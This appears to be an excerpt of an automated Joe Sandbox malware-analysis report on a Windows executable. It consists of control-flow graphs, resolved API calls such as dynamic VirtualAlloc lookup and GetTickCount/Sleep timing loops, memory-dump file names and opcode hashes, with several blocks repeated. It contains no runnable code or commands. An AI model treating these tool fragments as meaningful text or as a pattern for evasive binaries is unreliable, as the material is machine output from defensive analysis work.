                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick$Sleep
                                                • String ID: d5R$2R
                                                • API String ID: 4250438611-1222254985
                                                • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick$Sleep
                                                • String ID: d5R$2R
                                                • API String ID: 4250438611-1222254985
                                                • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ee2b1771d27a12b3de33157dcf94a6c70c31f5f1231773a26f98251efbb0ad1
                                                • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                • Opcode Fuzzy Hash: 0ee2b1771d27a12b3de33157dcf94a6c70c31f5f1231773a26f98251efbb0ad1
                                                • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 40 564678-564683 41 564685-564689 40->41 42 564699-5646a8 40->42 43 564812-564816 41->43 44 56468f-564693 41->44 45 5646f1-5646f4 42->45 46 56482e-564833 43->46 47 564818-56481c 43->47 44->42 44->43 48 5646f6-564716 03083A2C 03083A11 45->48 49 5646aa-5646b0 45->49 47->46 52 56481e-56482b 47->52 53 56478c-564791 48->53 50 5646b2-5646ba 49->50 51 5646ec-5646ef 49->51 50->51 54 5646bc-5646bd 50->54 51->45 52->46 55 564793-5647aa 53->55 56 564718-564725 03083A2C 53->56 59 5646bf-5646cd 54->59 57 5647ac-5647af 55->57 58 5647cb-5647d2 55->58 60 564727-564733 03083982 56->60 61 564735-564737 56->61 57->58 62 5647b1 57->62 65 5647d4-5647d7 58->65 66 5647ea-564810 call 4250a4 58->66 67 5646cf-5646e6 59->67 68 5646e8-5646ea 59->68 60->61 63 564789 61->63 64 564739-56473d 61->64 69 5647b2-5647c9 62->69 63->53 70 564743 64->70 71 56473f-564741 64->71 65->66 72 5647d9 65->72 66->43 67->68 68->51 68->59 69->58 69->69 73 564746-564749 70->73 71->73 74 5647da-5647e8 72->74 76 564783-564787 73->76 74->66 74->74 76->63 77 56474b-564750 76->77 78 564752-56475f 03083A11 77->78 79 564761-564768 03083A11 77->79 80 56476d-564773 78->80 79->80 81 564775-56477c 80->81 82 56477e 80->82 83 564780 81->83 82->83 83->76
                                                APIs
                                                • 03083A2C.KERNEL32(kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000,00000000), ref: 00564700
                                                • 03083A11.KERNEL32(00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000), ref: 00564706
                                                • 03083A2C.KERNEL32(?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900), ref: 0056471C
                                                • 03083982.KERNEL32(?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000), ref: 0056472E
                                                • 03083A11.KERNEL32(00000000,?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 0056475A
                                                • 03083A11.KERNEL32(00000000,00000000,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 00564768
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: 03083$03083982
                                                • String ID: VirtualAlloc$kernel32.dll
                                                • API String ID: 2240198184-2067260499
                                                • Opcode ID: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                • Instruction ID: 8910996fa2440a084c299a82da12af2e7996832243bad71df7333c1e6ec95c12
                                                • Opcode Fuzzy Hash: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                • Instruction Fuzzy Hash: 85518C7660020A9FDB10CF68D985BAA3BB5FF96318F258254F801AB355D370EC61CF61

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 100 4047ce-407aba call 4025e0 105 407ad8 100->105 106 407abc-407ad6 100->106 107 407ae2-407b15 105->107 106->107 110 407b17-407b38 107->110 111 407b3a 107->111 112 407b44-407b75 110->112 111->112 115 407b77-407b98 112->115 116 407b9a 112->116 117 407ba4-407bc4 115->117 116->117 120 407bd3-407be1 117->120 121 407bc6 117->121 122 407be3-407bfd 120->122 123 407bff 120->123 121->120 124 407c09-407c3c 122->124 123->124 127 407c61 124->127 128 407c3e-407c5f 124->128 129 407c6b-407c97 127->129 128->129 132 407c99-407cba 129->132 133 407cbc 129->133 134 407cc6-407cf6 132->134 133->134 138 407cf8-407d19 134->138 139 407d1b 134->139 140 407d25-407d33 138->140 139->140 142 407d51 140->142 143 407d35-407d4f 140->143 144 407d5b-407d8e 142->144 143->144 147 407d90-407db1 144->147 148 407db3 144->148 149 407dbd-407deb 147->149 148->149 152 407e10 149->152 153 407ded-407e0e 149->153 154 407e1a-407e70 152->154 153->154 161 407e76-407e84 154->161 162 407f98-407fa6 154->162 165 407ea2 161->165 166 407e86-407ea0 161->166 163 407fc4 162->163 164 407fa8-407fc2 162->164 167 407fce-408001 163->167 164->167 168 407eac-407edf 165->168 166->168 175 408003-408024 167->175 176 408026 167->176 173 407ee1-407f02 168->173 174 407f04 168->174 177 407f0e-407f3c 173->177 174->177 178 408030-40805e 175->178 176->178 185 407f61 177->185 186 407f3e-407f5f 177->186 183 408060-408081 178->183 184 408083 178->184 187 40808d-4080b0 183->187 184->187 188 407f6b-407f93 185->188 186->188 195 4080b9-408110 call 40ee70 187->195 188->195 203 408112-40812c 195->203 204 40812e 195->204 205 408138-40816b 203->205 204->205 208 408190 205->208 209 40816d-40818e 205->209 210 40819a-4081c8 208->210 209->210 213 4081ca-4081eb 210->213 214 4081ed 210->214 215 4081f7-4087e2 call 40ee70 * 12 call 4125a0 213->215 214->215 335 4087e7-40885d 215->335 343 4088bb-4088d6 335->343 344 40885f-4088b6 call 418c90 * 2 335->344 349 408979-408994 343->349 350 4088dc-4088f5 call 4125a0 343->350 356 408a32-408c4f call 40ee70 * 6 344->356 349->356 357 40899a-4089b3 call 4125a0 349->357 358 408937-408974 350->358 359 4088f7-408930 call 40fba0 call 415660 350->359 367 4089f5-408a25 357->367 368 4089b5-4089ee call 40fba0 call 415660 357->368 358->356 359->358 367->356 368->367
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: RO$;$MGH+$2$Once$S$~
                                                • API String ID: 0-884499449
                                                • Opcode ID: f3b9d97ce9a9ce714630864383cf758be6ec345587d7d0063048fb4146a72bca
                                                • Instruction ID: d8ffa30b5bef139f52c4a73f7c17676408c317d34ff610f7f65341f5a4a4674a
                                                • Opcode Fuzzy Hash: f3b9d97ce9a9ce714630864383cf758be6ec345587d7d0063048fb4146a72bca
                                                • Instruction Fuzzy Hash: B2B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 442 42535b-425362 440->442 443 425369-425372 call 424fc4 440->443 442->443 445 425364-425366 442->445 451 425374-42537b 443->451 452 42537d-425382 443->452 445->443 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 463 4253b4 call 425254 460->463 464 4253b9-4253bc 460->464 461->453 462 42539a-42539b FreeLibrary 461->462 462->453 463->464 466 4253d8-4253e5 464->466 467 4253be-4253c5 464->467 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 4"B$<"B
                                                • API String ID: 0-2488709930
                                                • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 442 42535b-425362 440->442 443 425369-425372 call 424fc4 440->443 442->443 445 425364-425366 442->445 451 425374-42537b 443->451 452 42537d-425382 443->452 445->443 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 463 4253b4 call 425254 460->463 464 4253b9-4253bc 460->464 461->453 462 42539a-42539b FreeLibrary 461->462 462->453 463->464 466 4253d8-4253e5 464->466 467 4253be-4253c5 464->467 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 4"B$<"B
                                                • API String ID: 0-2488709930
                                                • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                APIs
                                                • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                • String ID:
                                                • API String ID: 730355536-0
                                                • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                APIs
                                                • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                • String ID:
                                                • API String ID: 730355536-0
                                                • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1318 425c04-425c06 1319 425bc8-425bcc 1318->1319 1320 425c0c-425c11 1318->1320 1322 425bce-425bdb SysFreeString 1319->1322 1323 425bdc 1319->1323 1320->1319 1321 425c17-425c21 SysReAllocStringLen 1320->1321 1324 425c27 1321->1324 1325 425b98-4261dc 1321->1325 1322->1323 1327 4261f6 1325->1327 1328 4261de-4261ee SysAllocStringLen 1325->1328 1328->1325 1329 4261f4 1328->1329 1329->1327
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocFree
                                                • String ID: "lB
                                                • API String ID: 344208780-2501005195
                                                • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 486 408c50-408d9c call 40ee70 * 4 511 408da2-408e7d 486->511 512 4091be-4091da 486->512 609 408e86-408e87 call 410180 511->609 515 4091e0-409209 call 4125a0 512->515 516 40948c-4094a8 512->516 521 40924b-409296 515->521 522 40920b-409244 call 40fba0 call 415660 515->522 524 409b34-409bba call 40ee70 * 2 516->524 525 4094ae-4094c7 call 4125a0 516->525 550 409298-4092a4 call 404c14 521->550 551 4092aa-40933d call 40ee70 521->551 522->521 572 409bc3-409bc9 524->572 533 409509-409582 525->533 534 4094c9-409502 call 40fba0 call 415660 525->534 573 409584-4095a5 533->573 574 4095a7 533->574 534->533 550->551 592 409362 551->592 593 40933f-409360 551->593 578 409bd0-409c56 572->578 576 4095b1-409646 call 410fb0 call 40ee70 573->576 574->576 623 4097e2-409858 call 410fb0 call 40ee70 576->623 624 40964c-4097dd call 40ee70 * 2 576->624 622 409c5f-409c67 call 411590 578->622 597 40936c-4093ff call 410780 592->597 593->597 655 409405-40947e 597->655 656 409487 597->656 614 408e8c-408f96 609->614 763 408f9f-408fa0 call 410180 614->763 628 409c6c-409c97 622->628 682 409aad-409af7 623->682 683 40985e-40986c 623->683 624->682 640 409c99-409ca6 628->640 641 409cab-409cb9 call 4125a0 628->641 651 409dec-409e72 call 40ee70 * 2 640->651 646 409cbe-409cc4 641->646 650 409cca-409ce4 646->650 646->651 664 40aba7 650->664 665 409cea-409d4b 650->665 730 409e7b-409e82 651->730 655->656 657 409ee9-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 656->657 884 40a272-40a2b9 call 40f8f0 657->884 885 40aa5b-40aa71 call 40f1d0 657->885 664->664 741 409d54-409d55 call 410180 665->741 721 409af9-409b1a 682->721 722 409b1c 682->722 687 40988a 683->687 688 40986e-409888 683->688 694 409894-4098c7 687->694 688->694 706 4098c9-4098ea 694->706 707 4098ec 694->707 713 4098f6-409924 706->713 707->713 728 409926-409947 713->728 729 409949 713->729 726 409b26-409b2f 721->726 722->726 726->657 736 409953-409aaa 728->736 729->736 739 409e89-409ea9 730->739 736->682 739->664 748 409d5a-409d6a 741->748 755 409d72-409d81 call 40fba0 748->755 761 409d86 755->761 768 409d93-409da7 call 415660 761->768 772 408fa5-40901f 763->772 776 409dac-409db1 768->776 805 409028-409029 call 410180 772->805 779 409db3 776->779 780 409db5-409dd0 776->780 781 409dd6-409de5 779->781 780->665 780->781 781->651 810 40902e-409168 805->810 871 409171-409172 call 410180 810->871 874 409177-4091b9 871->874 898 40a329-40a370 call 40f8f0 884->898 899 40a2bb-40a320 884->899 889 40aa73-40aa7a call 40f1a0 885->889 890 40aa7f-40aac9 885->890 889->890 901 40aacb-40aaec 890->901 902 40aaee 890->902 918 40a3e0-40a427 call 40f8f0 898->918 919 40a372-40a3d7 898->919 899->898 905 40aaf8-40ab84 901->905 902->905 931 40a497-40a4de call 40f8f0 918->931 932 40a429-40a48e 918->932 919->918 944 40a4e0-40a545 931->944 945 40a54e-40a595 call 40f8f0 931->945 932->931 944->945 957 40a605-40a64c call 40f8f0 945->957 958 40a597-40a5fc 945->958 970 40a6bc-40a703 call 40f8f0 957->970 971 40a64e-40a6b3 957->971 958->957 983 40a773-40a7ba call 40f8f0 970->983 984 40a705-40a76a 970->984 971->970 996 40a82a-40a871 call 40f8f0 983->996 997 40a7bc-40a821 983->997 984->983 1009 40a8e1-40a928 call 40f8f0 996->1009 1010 40a873-40a8d8 996->1010 997->996 1022 40a998-40a9df call 40f8f0 1009->1022 1023 40a92a-40a98f 1009->1023 1010->1009 1035 40a9e1-40aa46 1022->1035 1036 40aa4f-40aa56 1022->1036 1023->1022 1035->1036
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: PR$ SE$w
                                                • API String ID: 0-1208491823
                                                • Opcode ID: 0bb3feb81a7f0a7f97eb96e07472ccc361aa35c21bfa60d3feb395852ad7d0a7
                                                • Instruction ID: f53b976b8ce61006246660fcac2eda25318b73a03b651b78969d3c0f2ac0d1d0
                                                • Opcode Fuzzy Hash: 0bb3feb81a7f0a7f97eb96e07472ccc361aa35c21bfa60d3feb395852ad7d0a7
                                                • Instruction Fuzzy Hash: 4BC2BB75900208EFDB14DFE0ED98EEE7B79FB48301F10816AF606A72A0DB745A45CB58

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1045 409eac-409ecf 1046 409ed6-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 1045->1046 1113 40a272-40a2b9 call 40f8f0 1046->1113 1114 40aa5b-40aa71 call 40f1d0 1046->1114 1127 40a329-40a370 call 40f8f0 1113->1127 1128 40a2bb-40a320 1113->1128 1118 40aa73-40aa7a call 40f1a0 1114->1118 1119 40aa7f-40aac9 1114->1119 1118->1119 1130 40aacb-40aaec 1119->1130 1131 40aaee 1119->1131 1147 40a3e0-40a427 call 40f8f0 1127->1147 1148 40a372-40a3d7 1127->1148 1128->1127 1134 40aaf8-40ab84 1130->1134 1131->1134 1160 40a497-40a4de call 40f8f0 1147->1160 1161 40a429-40a48e 1147->1161 1148->1147 1173 40a4e0-40a545 1160->1173 1174 40a54e-40a595 call 40f8f0 1160->1174 1161->1160 1173->1174 1186 40a605-40a64c call 40f8f0 1174->1186 1187 40a597-40a5fc 1174->1187 1199 40a6bc-40a703 call 40f8f0 1186->1199 1200 40a64e-40a6b3 1186->1200 1187->1186 1212 40a773-40a7ba call 40f8f0 1199->1212 1213 40a705-40a76a 1199->1213 1200->1199 1225 40a82a-40a871 call 40f8f0 1212->1225 1226 40a7bc-40a821 1212->1226 1213->1212 1238 40a8e1-40a928 call 40f8f0 1225->1238 1239 40a873-40a8d8 1225->1239 1226->1225 1251 40a998-40a9df call 40f8f0 1238->1251 1252 40a92a-40a98f 1238->1252 1239->1238 1264 40a9e1-40aa46 1251->1264 1265 40aa4f-40aa56 1251->1265 1252->1251 1264->1265
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
